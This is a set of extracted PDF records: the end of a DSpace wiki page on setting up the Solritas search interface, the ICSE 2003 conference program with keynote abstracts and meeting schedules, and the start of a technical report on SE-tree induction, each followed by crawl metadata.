name="v.base_dir">/solr/contrib/velocity/src/main/templates</str>--> <!--</lst>--> <!--</requestHandler--> • cp -r ./apache-solr-3.5.0/example/solr/conf/velocity [dspace]/solr/search/conf/ • restart Tomcat • Solritas should be available at http://localhost:8080/solr/search/browse/ It should also be possible to use it in other versions of DSpace (starting from 1.6), but these use different versions of Solr, so modify the procedure accordingly (and expect other caveats): <table> <thead> <tr> <th>DSpace</th> <th>Solr</th> </tr> </thead> <tbody> <tr> <td>DSpace 6</td> <td>4.10.2</td> </tr> <tr> <td>DSpace 5</td> <td>4.10.2</td> </tr> <tr> <td>DSpace 4</td> <td>4.4.0</td> </tr> <tr> <td>DSpace 3</td> <td>3.5.0</td> </tr> <tr> <td>DSpace 1.8</td> <td>3.3.0</td> </tr> <tr> <td>DSpace 1.7</td> <td>1.4.1</td> </tr> <tr> <td>DSpace 1.6</td> <td>1.3.0</td> </tr> </tbody> </table> Note: In older versions, you may need to specify the queryResponseWriter class as org.apache.solr.request.VelocityResponseWriter (I haven't tested it, though) Resources: • http://wiki.apache.org/solr/VelocityResponseWriter Guidepost Other pages on this wiki describing Solr and Discovery. • Discovery Official DSpace 3.x documentation • DSpace Discovery Discovery proposal & purpose, intro video, Discovery 1.8 changes & configuration • DSpace Discovery HowTo Discovery screenshots (before Discovery was included in DSpace), most content obsolete (pre-1.7.0) See also: • Solr Tutorial • ajax-solr, a JavaScript library for creating user interfaces to Solr. • /var/log/tomcat6/catalina.out
{"Source-Url": "https://wiki.lyrasis.org/download/temp/pdfexport-20210815-150821-1508-1891/DSPACE-Solr-150821-1508-1892.pdf?contentType=application/pdf", "len_cl100k_base": 5632, "olmocr-version": "0.1.50", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 22201, "total-output-tokens": 6268, "length": "2e12", "weborganizer": {"__label__adult": 0.0002363920211791992, "__label__art_design": 0.00041747093200683594, "__label__crime_law": 0.00022685527801513672, "__label__education_jobs": 0.0010251998901367188, "__label__entertainment": 0.00017082691192626953, "__label__fashion_beauty": 0.00011157989501953124, "__label__finance_business": 0.0003285408020019531, "__label__food_dining": 0.0002028942108154297, "__label__games": 0.0008683204650878906, "__label__hardware": 0.0006937980651855469, "__label__health": 0.00015437602996826172, "__label__history": 0.0002644062042236328, "__label__home_hobbies": 0.00011724233627319336, "__label__industrial": 0.00017821788787841797, "__label__literature": 0.00027942657470703125, "__label__politics": 0.0001798868179321289, "__label__religion": 0.0003535747528076172, "__label__science_tech": 0.0124359130859375, "__label__social_life": 0.00022161006927490232, "__label__software": 0.282958984375, "__label__software_dev": 0.69775390625, "__label__sports_fitness": 0.00018334388732910156, "__label__transportation": 0.00016498565673828125, "__label__travel": 0.00027060508728027344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21428, 0.02011]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21428, 0.22974]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21428, 0.75173]], "google_gemma-3-12b-it_contains_pii": [[0, 2954, false], [2954, 5918, null], [5918, 8709, null], [8709, 11343, null], [11343, 11832, null], [11832, 14982, null], [14982, 16540, null], [16540, 19178, null], [19178, 21428, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2954, true], [2954, 5918, null], [5918, 8709, null], [8709, 11343, null], [11343, 11832, null], [11832, 14982, null], [14982, 16540, null], [16540, 19178, null], [19178, 21428, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 21428, null]], "pdf_page_numbers": [[0, 2954, 1], [2954, 5918, 2], [5918, 8709, 3], [8709, 11343, 4], [11343, 11832, 5], [11832, 14982, 6], [14982, 16540, 7], [16540, 19178, 8], [19178, 21428, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21428, 0.05629]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
3c31ba2639cbfff385c68f5406c328bbdb06f329
Welcome to ICSE 2003, Software Engineering Week in Portland! A MESSAGE FROM THE CHAIRS Welcome to the silver anniversary of the International Conference on Software Engineering! Managing the complexity of modern software systems is without question a grand challenge for software engineering. It is therefore fitting that, inspired by the view of Mount Hood, the theme for this year’s meeting is:Scaling New Heights. ICSE 2003 brings together world leaders in software engineering research, practice, and education to present and discuss the most recent advances, trends, and concerns in this ever expanding and critical field. Software Engineering is a vibrant and growing discipline. This year there was a significant increase in submissions in all areas, with 324 technical papers, 52 education papers, and 61 experience reports submitted. All submissions were rigorously reviewed by multiple experts on the ICSE 2003 committees (a minimum of three reviewers for technical papers), leading to the acceptance of 42 technical papers, 16 experience reports, and 11 education papers. The result is an impressive program. The ICSE Software Engineering Week, May 3 to 10, 2003, consists of the main ICSE conference and an interesting array of tutorials, workshops, and related events associated or co-located with ICSE. Each morning of the ICSE 2003 conference starts with a topical keynote address by an outstanding speaker. Other notable highlights of the program are: three mini-tutorials on new and promising software engineering technologies in the Frontiers of Software Practice (FoSP) track; a mini-tutorial on how to write a good research paper in software engineering; and participation from the automotive community in a session on automotive software engineering. Throughout the conference, there are also exhibits, posters, and research demonstrations, as well as a morning newsletter describing memorable moments from the previous day, humor, and fascinating facts. Finally, the conference features several breaks, lunches, and receptions providing opportunities to meet and mingle with old and new friends. Prior to and immediately following the main ICSE 2003 program, there are 13 tutorials on a variety of topics and 14 workshops that offer a forum for interaction. There are also three special events: the Pioneers Symposium, the New Software Engineering Faculty Symposium, and the Doctoral Symposium. Finally, the week includes five co-located workshops and events; the Workshop on Software Configuration Management (SCM-11), the International SPIN Workshop on Model Checking of Software (SPIN 2003), the Workshop on Software Process Simulation Modeling (ProSim 2003), the International Workshop on Program Comprehension (IWPC 2003), and the Summit on Software Engineering Education. ICSE 2003 is being held in the Portland Hilton Hotel, which resides in the heart of Portland’s entertainment and cultural district, with access to performing arts, shopping, museums, coffee houses, microbreweries, and numerous restaurants, all within three blocks. We hope you seize the opportunity, perhaps before or after this busy Software Engineering week, to explore the “Rose City” and the many recreational opportunities of the Pacific Northwest. A conference as diverse as ICSE requires the efforts of a number of volunteers. Thank you, members of the ICSE 2003 program committee, organizing committee, and all sub-committees! We also wish to acknowledge the support of our donors and sponsors. Finally, thank you for joining us at this the silver anniversary of ICSE. We anticipate that a memorable week of presentations, discussions, and demonstrations lies ahead. Enjoy! http://www.icse-conferences.org/2003/ Lori A. Clarke General Chair Laura K. Dillon Program Co-Chair Walter Tichy Program Co-Chair ### Table of Contents - Conference Committees .................................................. inside front cover - Welcome Message ............................................................... 1 - Keynote Speakers ............................................................... 3 - Frontiers of Software Practice (FoSP) ................................... 4 #### Program <table> <thead> <tr> <th>Date</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>ICSE Overall Program</td> <td>........................................................................</td> </tr> <tr> <td>Community Meetings at ICSE</td> <td>........................................................................</td> </tr> <tr> <td>Saturday May 3</td> <td>........................................................................</td> </tr> <tr> <td>Sunday May 4</td> <td>........................................................................</td> </tr> <tr> <td>Monday May 5</td> <td>........................................................................</td> </tr> <tr> <td>Tuesday May 6</td> <td>........................................................................</td> </tr> <tr> <td>Wednesday May 7</td> <td>........................................................................</td> </tr> <tr> <td>Thursday May 8</td> <td>........................................................................</td> </tr> <tr> <td>Friday May 9</td> <td>........................................................................</td> </tr> <tr> <td>Saturday May 10</td> <td>........................................................................</td> </tr> <tr> <td>Sunday May 11</td> <td>........................................................................</td> </tr> </tbody> </table> #### ICSE Events, Workshops, Tutorials, Panels, Demos and Posters - Doctoral Symposium ....................................................... 17 - New Software Engineering Faculty Symposium (NSEFS 03) .......... 17 - Pioneers Symposium .......................................................... 17 - Agile Development: A Cooperative Learning Experience .......... 18 - Workshops ......................................................................... 18 - Tutorials ........................................................................... 23 - Panels ............................................................................... 28 - Demonstrations and Posters ............................................... 29 #### Venue and Additional Information - City of Portland, Reception, WOW! Newsletter, Student Volunteers .......................................................... 32 - ICSE 2004 and ICSE 2005 Announcements ............................... inside back cover - Hotel Maps ........................................................................ back cover - Sponsors and Donors ............................................................. back cover #### Other Events Co-located with ICSE 2003 - **ProSim’03:** Workshop: Software Process Simulation Modeling (held off-site at Portland State University), May 3-4 - **SSEE II:** 2nd International Summit on Software Engineering Education, May 5 - **SPIN 2003:** The 10th International SPIN Workshop on Model Checking of Software, May 9-10 - **SCM-11:** 11th International Workshop on Software Configuration Management, May 9-10 - **IWPC 2003:** 11th International Workshop on Program Comprehension, May 10-11 The Grand Challenge of Trusted Components Bertrand Meyer, ETH, Zürich, and ISE Santa Barbara, USA Component-based development, one of the most promising paths of progress for the world of software engineering, is fraught with risks if it isn’t accompanied by a constant concern for quality. Components of demonstrably high quality may, on the other hand, bring a critical contribution to the improvement of both software products and the software process. This presentation will address the challenge of building “trusted components” whose quality can be guaranteed. It will discuss both the “low road” of certifying components built with current technologies and the “high road” of proving component properties. Bertrand Meyer is Professor of Software Engineering at the ETH (Swiss Federal Institute of Technology) and Scientific Advisor of ISE, the company he co-founded in 1985. He is the author of a number of books including “Object-Oriented Software Construction, 2nd edition,” “Eiffel: The Language” and “Reusable Software.” He has been involved in the design of numerous libraries and tools applying the principles of “Design by Contract” and object technology. Must There Be So Few? Including Women in CS Joanne McGrath Cohoon, Department of Leadership, Foundations and Policy, University of Virginia, USA Women’s participation in undergraduate computing is low and likely to continue declining. This situation is not due to intractable gender differences, however. It has been demonstrated that academic computing departments can effectively recruit and retain female students. Dr. Cohoon will describe the current state of affairs and discuss how and why departments can act to reverse this trend. Joanne McGrath Cohoon is a sociologist who studies higher education, gender, and technology. She earned her BA in Philosophy from Ramapo College of New Jersey; her MA in Student Personnel Administration from Teacher’s College, Columbia University; and her Ph.D. in Sociology from the University of Virginia in 2000. Dr. Cohoon has held professional positions in higher education as a researcher, administrator, and instructor at a women’s college, a survey research center, a center for public service, and a continuing education program. She is currently a Research Assistant Professor in the Curry School of Education at the University of Virginia. Her research has been funded by the Alfred P. Sloan Foundation and the National Science Foundation. She is a member of the ACM, SIGCSE, and sociological and higher education professional organizations. Relating Software Engineering and Information Security Eugene Spafford, Purdue University, USA There are many connections between software engineering (SE) and information security (infosec). Some are obvious, such as the process of detecting software faults, and some are more subtle, such as definition and capture of privacy requirements. In both infosec and SE there are complex challenges of how best to balance cost, design, technology, and time to market: Too often, good practices are skipped because of cost or time. Meanwhile, failures in both areas can lead to everything from minor inconvenience to catastrophic failures and compromises. In this talk, I intend to explain some of the connections I see between SE and infosec. In particular, I hope to illustrate how some of the challenges — and advances — in infosec have a basis in SE. Some of these suggest high-leverage areas of research, while others provide insight about why we will continue to experience security problems in widely deployed software. For instance, is there truth to the contention that open source software is more secure than proprietary source? Along the way, I will connect Las Vegas, the PDP-11, Roman chariots, and a common security flaw as one illustration of how unintended consequences shape both security and software development. continued next page Keynote Speakers continued from page 3 Eugene H. Spafford is a professor of Computer Sciences at Purdue University, a professor of Philosophy (courtesy appointment), and is Director of the Center for Education and Research in Information Assurance and Security (CERIAS). Spaf's research career has included work in information security, software engineering, distributed systems, and professional ethics. Dr. Spafford is a Fellow of the ACM, Fellow of the AAAS, Fellow of the IEEE, and is a charter recipient of the Computer Society's Golden Core award. He was the year 2000 recipient of the NIST/NCSC National Computer Systems Security Award, generally regarded as the field's most significant honor in information security research. In 2001, he was elected to the ISSA Hall of Fame, and he was awarded the William Hugh Murray medal of the NCISSE for his contributions to research and education in infosec. Among his many activities, Spaf is co-chair of the ACM's U.S. Public Policy Committee and of its Advisory Committee on Computer Security and Privacy, is a member of the Board of Directors of the Computing Research Association, and is a member of the US Air Force Scientific Advisory Board. Frontiers of Software Practice (FoSP) FoSP talks are mini-tutorials that provide an overview of a topic at the frontier of software practice. Component Technology - What, Where, and How? Tuesday, May 6 Clemens Szyperski, Microsoft Corporation, USA Software components, if used properly, offer many software engineering benefits. Yet, they also pose many challenges starting from quality assurance and ranging to architectural embedding and composability. In addition, the recent movement towards services as well as the established world of objects cause many to wonder what purpose components might have. This talk offers an end-to-end overview of what components should do, where they should be used, and how this can be achieved. Clemens Szyperski is a Software Architect with Microsoft, which he joined in 1999, and affiliated with Microsoft Research, both in Redmond, WA. He is also an adjunct professor at Queensland University of Technology in Brisbane, Australia. He received his Ph.D. in computer science from the Swiss Federal Institute of Technology (ETH) in Zurich, Switzerland under Prof. Niklaus Wirth. Clemens is the award-winning author of "Component Software: Beyond Object-Oriented Programming," which is being released in its second edition. He is also the co-author of "Software Ecosystem: An Indispensable Industry and Technology," to appear later this year. In addition, he has published several other books and many articles, and he frequently presents at international events. Clemens has worked as an academic, researcher, and practitioner in the areas of programming languages, component technologies, software systems, and software architecture. He is a co-founder of Oberon Microsystems in Zurich, specializing in component technology and software architecture. He has served as a consultant to large corporations and serves as an assessor and reviewer for domestic, federal, and international funding agencies and for learned journals across the globe. He has been a member of program and organizing committees of numerous events, including many of the most prestigious conferences in his discipline areas. Patterns, Frameworks, and Middleware: Their Synergistic Relationship Wednesday, May 7 Douglas Schmidt, Vanderbilt University, DARPA, USA Historically, the knowledge required to develop mission-critical software systems has largely existed in programming folklore, the heads of experienced researchers and developers, or buried deep within complex source code. Today’s methods and tools for software modeling help somewhat by capturing how a system is designed. They only automate limited portions of software development, however, and do not articulate why a system is designed in a particular way, which may complicate software evolution and optimization. Patterns, frameworks, and middleware are increasingly popular techniques for addressing the challenges outlined above. Patterns codify design expertise that provides time-proven solutions to commonly occurring software problems that arise in particular contexts. Frameworks provide (1) a reusable architecture-based on patterns-for a family of related applications and (2) an integrated set of collaborating components that implement concrete realizations of the architecture. Middleware is a class of software that leverages patterns and frameworks to increase systematic reuse significantly by bridging the gap between the end-to-end functional requirements of applications and the underlying operating systems and network protocol stacks. The relationship between patterns, frameworks, and middleware is highly synergistic. For example, patterns help guide framework creation and use, thereby reducing development effort and training costs. In turn, frameworks can be used to develop middleware, whose interfaces then provide a simpler facade for the complex internal component structure of the frameworks. This talk describes the synergy between patterns, frameworks, and middleware and illustrates how they have been applied successfully in many production mission-critical software systems. Dr. Schmidt is a Professor in the Electrical Engineering and Computer Science Department at Vanderbilt University. His research focuses on patterns, optimization techniques, and empirical analyses of object-oriented frameworks that facilitate the development of high-performance, real-time distributed object computing middleware on parallel platforms running over high-speed networks and embedded system interconnects. In addition to his academic research, Dr. Schmidt has over fifteen years of experience developing object-oriented middleware, in particular ACE and TAO, which are widely-used frameworks that implement patterns for high-performance, real-time systems. Dr. Schmidt also serves as a program manager in the DARPA Information Exploitation Office (IXO), where he leads the effort on distributed object computing middleware research. CyberSecurity: What are Best Practices? Richard Kemmerer, University of California at Santa Barbara, USA As more business activities are being automated and an increasing number of computers are being used to store vital and sensitive information, the need for secure computer systems becomes apparent. This need is even more apparent as systems and applications are being distributed and access is via an insecure network. Secure systems and networks can be obtained only through systematic development; they cannot be achieved through haphazard seat-of-the-pants methods. The pervasive use of computer and network technologies in all walks of life has turned cybersecurity issues into national security issues. The Internet has become critical for governments, companies, financial institutions, and millions of everyday users. Networks of computers support a multitude of activities whose loss would all but cripple these organizations. Protecting these critical infrastructures is a difficult task. This talk introduces some known threats to cybersecurity, categorizes the threats, and analyzes protection mechanisms and techniques for countering the threats. Approaches to prevent, detect, and respond to cyber attacks will also be discussed. Richard A. Kemmerer is a Professor and past Chair of the Department of Computer Science at the University of California, Santa Barbara. He is a Fellow of the IEEE Computer Society and of the ACM, and past Editor-in-Chief of IEEE Transactions on Software Engineering. Dr. Kemmerer was the program co-chair of the 20th International Conference on Software Engineering (ICSE’98). He has served as a member of the National Academy of Science’s Committee on Computer Security in the DOE, the System Security Study Committee, the Committee for Review of the Oversight Mechanisms for Space Shuttle Flight Software Processes, the Committee on Maintaining Privacy and Security in Health Care Applications of the National Information Infrastructure, and the Committee on the Review of Programs for Command, Control, Communication, Computers, and Intelligence (C4I) in the Department of Defense. He has also served as a member of the National Computer Security Center’s Formal Verification Working Group and was a member of the NIST’s Computer and Telecommunications Security Council. Dr. Kemmerer is also the past Chair of the IEEE Technical Committee on Security and Privacy and a past member of the Advisory Board for the ACM’s Special Interest Group on Security, Audit, and Control. He has written numerous papers on the subjects of computer security, formal specification and verification, software testing, programming languages, and software complexity measures. He is the author of the book “Formal Specification and Verification of an Operating System Security Kernel” and a co-author of “Computers at Risk: Safe Computing in the Information Age.” He has been a Principal Investigator on numerous government and private sector sponsored projects and leads the Reliable Software Group at UCSB. Under his direction the Reliable Software Group has addressed the need for better languages and tools for designing, building, validating, and securing software systems. ICSE 2003 Overall Program At-A-Glance <table> <thead> <tr> <th>Sat. May 3</th> <th>Sun. May 4</th> <th>Mon. May 5</th> <th>Tue. May 6</th> <th>Wed. May 7</th> <th>Thu. May 8</th> <th>Fri. May 9</th> <th>Sat. May 10</th> </tr> </thead> <tbody> <tr> <td>Workshops W1-W4</td> <td>Doctoral Symp.</td> <td>Technical Program</td> <td>Workshop W10</td> <td>Workshops W6-W9</td> <td>Pioneers Symp.</td> <td>New Faculty Symp.</td> <td>Workshops W11-W15</td> </tr> <tr> <td>Workshops W6-W9</td> <td>Tutorials F3-F6</td> <td>Tutorials F7-F8, F10-F11, H1-H6</td> <td>Computing Curricula for SE (CCSE)</td> <td>Demos</td> <td>Awards</td> <td>Closing Ceremonies</td> <td>SPIN</td> </tr> </tbody> </table> Community Meetings at ICSE <table> <thead> <tr> <th>Date</th> <th>Time</th> <th>Meeting</th> <th>Location</th> </tr> </thead> <tbody> <tr> <td>Sunday May 4</td> <td>8am - 6pm</td> <td>ESEC/FSE PC Meeting</td> <td>Grand Ballroom II</td> </tr> <tr> <td>Monday May 5</td> <td>8am - 6pm</td> <td>ESEC/FSE PC Meeting</td> <td>Grand Ballroom II</td> </tr> <tr> <td>Monday May 5</td> <td>6 - 7pm</td> <td>ICSE ’04 PC Meeting</td> <td>Parlor A&amp;B</td> </tr> <tr> <td>Monday May 5</td> <td>7:30 - 10:30pm</td> <td>ICSE steering committee meeting</td> <td>Alexander’s</td> </tr> <tr> <td>Tuesday May 6</td> <td>12 -1:30pm</td> <td>SIGSOFT Executive Committee Meeting</td> <td>Senate</td> </tr> <tr> <td>Tuesday May 6</td> <td>5 - 6pm</td> <td>SIGSOFT General Meeting</td> <td>Broadway II-IV</td> </tr> <tr> <td>Tuesday May 6</td> <td>6 - 7pm</td> <td>TCSE General Meeting</td> <td>Broadway II-IV</td> </tr> <tr> <td>Tuesday May 6</td> <td>6 - 10pm</td> <td>IFSA</td> <td>Forum</td> </tr> <tr> <td>Wednesday May 7</td> <td>12 - 1:30pm</td> <td>ICM Steering Committee Meeting</td> <td>Senate</td> </tr> <tr> <td>Wednesday May 7</td> <td>12 - 1:30pm</td> <td>ESEC/FSE Steering Committee Meeting</td> <td>Studio</td> </tr> <tr> <td>Wednesday May 7</td> <td>6 - 7pm</td> <td>ISSTA Steering Committee Meeting</td> <td>Studio</td> </tr> <tr> <td>Wednesday May 7</td> <td>7 - 9pm</td> <td>TSE board meeting and dinner</td> <td>Alexander’s Crown Room</td> </tr> <tr> <td>Friday May 9</td> <td>8:30-11am</td> <td>ICSE postmortem</td> <td>Alexander’s</td> </tr> </tbody> </table>
{"Source-Url": "http://www.icse-conferences.org/2003/Posters/p2.pdf", "len_cl100k_base": 4862, "olmocr-version": "0.1.49", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 15874, "total-output-tokens": 4913, "length": "2e12", "weborganizer": {"__label__adult": 0.0003800392150878906, "__label__art_design": 0.00044655799865722656, "__label__crime_law": 0.0003767013549804687, "__label__education_jobs": 0.00952911376953125, "__label__entertainment": 9.489059448242188e-05, "__label__fashion_beauty": 0.00017368793487548828, "__label__finance_business": 0.0002493858337402344, "__label__food_dining": 0.0004453659057617187, "__label__games": 0.0007085800170898438, "__label__hardware": 0.0006184577941894531, "__label__health": 0.0005869865417480469, "__label__history": 0.00033164024353027344, "__label__home_hobbies": 0.0001004338264465332, "__label__industrial": 0.0003070831298828125, "__label__literature": 0.0003421306610107422, "__label__politics": 0.00028252601623535156, "__label__religion": 0.0005340576171875, "__label__science_tech": 0.01511383056640625, "__label__social_life": 0.00023186206817626953, "__label__software": 0.0090789794921875, "__label__software_dev": 0.958984375, "__label__sports_fitness": 0.0004031658172607422, "__label__transportation": 0.00041365623474121094, "__label__travel": 0.0003643035888671875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 22435, 0.01659]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 22435, 0.04194]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 22435, 0.9121]], "google_gemma-3-12b-it_contains_pii": [[0, 3821, false], [3821, 7471, null], [7471, 11392, null], [11392, 15955, null], [15955, 20754, null], [20754, 22435, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3821, true], [3821, 7471, null], [7471, 11392, null], [11392, 15955, null], [15955, 20754, null], [20754, 22435, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 22435, null]], "pdf_page_numbers": [[0, 3821, 1], [3821, 7471, 2], [7471, 11392, 3], [11392, 15955, 4], [15955, 20754, 5], [20754, 22435, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 22435, 0.16495]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
75769165078de4b17aee0f65e440debfa770aa18
April 1993 An SE-Tree Based Characterization of the Induction Problem Ron Rymon University of Pennsylvania Follow this and additional works at: http://repository.upenn.edu/cis_reports Recommended Citation This paper is posted at ScholarlyCommons. http://repository.upenn.edu/cis_reports/262 For more information, please contact repository@pobox.upenn.edu. An SE-Tree Based Characterization of the Induction Problem Abstract Many induction programs use decision trees both as the basis for their search, and as a representation of their classifier solution. In this paper we propose a new structure, called SE-tree, as a more general alternative. Comments This technical report is available at ScholarlyCommons: http://repository.upenn.edu/cis_reports/262 An SE-tree based Characterization of the Induction Problem MS-CIS-93-42 LINC LAB 248 Ron Rymon University of Pennsylvania School of Engineering and Applied Science Computer and Information Science Department Philadelphia, PA 19104-6389 April 1993 An SE-tree based Characterization of the Induction Problem Ron Rymon Computer and Information Science University of Pennsylvania Philadelphia, PA 19104 rymon@linc.cis.upenn.edu (Proceedings Machine Learning Conference, Amherst MA, 1993) Abstract Many induction programs use decision trees both as the basis for their search, and as a representation of their classifier solution. In this paper we propose a new structure, called SE-tree, as a more general alternative. 1 INTRODUCTION Many learning algorithms use decision trees as an underlying framework for search and as a representation of their classifier solutions (e.g. ID3 [Quinlan, 86], CART [Breiman et al., 84]). This framework, however, is known to mix search bias (introduced when the algorithm decides on the order in which attributes are to be used in splitting) with hypotheses-space bias. To avoid being trapped by this bias, several researchers have suggested averaging over multiple trees (e.g. [Buntine, 91]). In this paper, still within a recursive partitioning framework, we propose using an alternative data structure called SE-tree [Rymon, 92]. On one hand, since the new framework shares many of the features of decision tree-based algorithms, we should be able to adopt many sub-techniques developed for the latter. On the other hand, an SE-tree embeds a large number of decision trees, thereby providing a more expressive, more flexible, representation for classifiers. Importantly, SE-tree-based algorithms can eliminate almost completely the search bias, admitting instead a user-specified hypotheses-space preference criterion. Section 2 outlines a formal theory of induction where classifiers take the form of collections of rules. Sections 3 and 4 present the SE-tree, and render it useful in searching and representing such collections (the learning phase), and in subsequently using them for classification. Incorporation of user-specified bias in either stage, or in both, is described in Sections 4 and 5. Section 6 presents general results relating the SE-tree to decision trees, with some algorithmic implications. 2 A THEORY FOR INDUCTION Formalizing the induction problem, we will examine collections of production rules that best model the function (concept) represented by the training data. Rules provide a common denominator for decision trees on one hand, and SE-trees on the other, since there is an obvious one-to-one mapping between rules and leaves of such trees. Let us introduce a few useful definitions first: Let \( \text{ATTRS} \) be a set of attributes (also called features or variables), where each attribute \( A_i \) can take values from a finite unordered discrete domain denoted \( \text{Dom}(A_i) \). A partial description is a subset of \( \text{ATTRS} \), each instantiated from its own domain. An object is a complete partial instantiation, i.e. one in which all attributes are instantiated. By \( \text{UNIVERSE} \) we refer to the collection of all objects. Consider, for example, a space of 3 binary attributes \((A,B,C)\), hereafter called 3BIN. In 3BIN, \{A=0,C=1\} is a partial description. \{A=0,B=0,C=1\} is an object. \( \text{UNIVERSE} \) is 3BIN itself; it is made of a total of 8 objects. A training set \( \text{TSET} \), consisting of objects labeled by their correct class \( \pi \), makes an induction problem instance. Example 2.1 (The Checkers Problem) Consider a universe defined by two 3-valued attributes \((A,B)\), and a set of four classes \((\alpha,\beta,\gamma,\delta)\). The following figure depicts a training data, and an illustration of \( \text{UNIVERSE} \). Having defined a problem instance, we shall try to characterize a solution. Conceptually, we assume the existence of a function \( \text{target} \) from \( \text{UNIVERSE} \) to the set of classes, and that the training data agree with this function. Our goal is to approximate \( \text{target} \) over the complete universe, using conjunctive rules as our elementary building blocks. A rule, $R$, is simply a partial description such that all objects in TSET that agree with it are equally classified, i.e. for every $t, t' \in TSET$, if $R \subseteq t, t'$ then $\pi(t) = \pi(t')$. To avoid irrelevant rules, we add the additional requirement that an object matched by a rule is provided in TSET. As a partial description, a rule defines an equivalence class within the universe, namely $[R] \equiv \{t \in \text{UNIVERSE} | R \subseteq t\}$. Moreover, since all objects in $\text{TSET} \cap [R]$ agree on their class, we can define $\pi([R])$ to be that class, and write a production rule of the form $R \Rightarrow \pi([R])$. Thus, from here on, we shall interchangeably talk about a rule as a set of instantiated attributes, as a region in UNIVERSE, and as a conjunction of antecedents. To model a target function, we use collections of rules, interpreted disjunctively for each class. In general, there may possibly be many such collections. The Checkers problem, for instance, admits 8 rules and thus $2^8$ collections. The purpose of an inductive theory is to characterize desirable features of candidate collections. Bias, or preference, expresses the relative desirability of one collection versus another. Our theory has a single bias: for the most part, we will prefer rules that are syntactically simpler. By kernel rules we refer to rules that are most-general (minimal set-wise). Other bias, necessary to distinguish equally simple hypotheses, is deliberately left out of the theory. Our algorithms will modularly implement a user-specified preference criterion. Consider the Checkers problem again. Only four of the eight rules are also kernel rules: (1) $(A=1) \Rightarrow \alpha$, (2) $(B=1) \Rightarrow \beta$, (3) $(B=3) \Rightarrow \gamma$, and (4) $(A=3) \Rightarrow \delta$. All other rules, e.g. $(A=1) \land (B=2) \Rightarrow \alpha$, are subsumed by one or more of the kernel rules. Let $C$ be a collection of rules for a problem instance $P$, we use Kernel(C) to denote the collection of kernel rules for $P$ that subsume rules in $C$. The collection of all kernel rules, denoted KRULES, is the target of our induction algorithms. Doing so, we avoid overfitting of the training data. We propose that over-generalization be dealt with in the classification phase via resolution methods based on the user's preference criterion. Intuitively, while learning, we adopt most-general principles. Rules that are too general will be in conflict with others, and will then be resolved. **Definition 2.2 Completeness** A collection of rules $C$ is said to be complete w.r.t. $T \subseteq \text{UNIVERSE}$ if for every $t \in T$, there exists a rule $R \in C$ such that $R \subseteq t$. **Proposition 2.3** 1. Let $C$ be a collection of rules that is complete w.r.t. some $T \subseteq \text{UNIVERSE}$, then Kernel(C) is also complete w.r.t. $T$; 2. KRULES is complete w.r.t. TSET, but is not necessarily complete w.r.t. UNIVERSE. Thus, in the Checkers problem, each of the “corner” objects is covered by two contradicting kernel rules (e.g. $\{A=1, B=1\}$ is covered by $(A=1) \Rightarrow \alpha$ and $(B=1) \Rightarrow \beta$). As per Proposition 2.5(2), KRULES may have (possibly several) sub-collections, the latter may have lesser coverage than KRULES. In contrast, any decision tree is consistent w.r.t. UNIVERSE. But is consistency desirable at all? KRULES is inconsistent when two rules are over-general to the point in which they contradict one another on as yet unseen parts of UNIVERSE. While ideally, one or both rules need be specialized or removed, the training data alone does not provide us with any suitable preference criterion. An external preference criteria, or bias [Mitchell, 80], must be applied. Bias can be defined as the set of all factors that collectively influence hypothesis selection [Utgoff, 86]. [Buntine, 90] divides such criteria into three separate classes: hypothesis space bias are those criteria which specify a preference for one classifier over another; search bias consists of criteria used to guide the actual search for such; and finally, bias may have an application specific component. Adopting 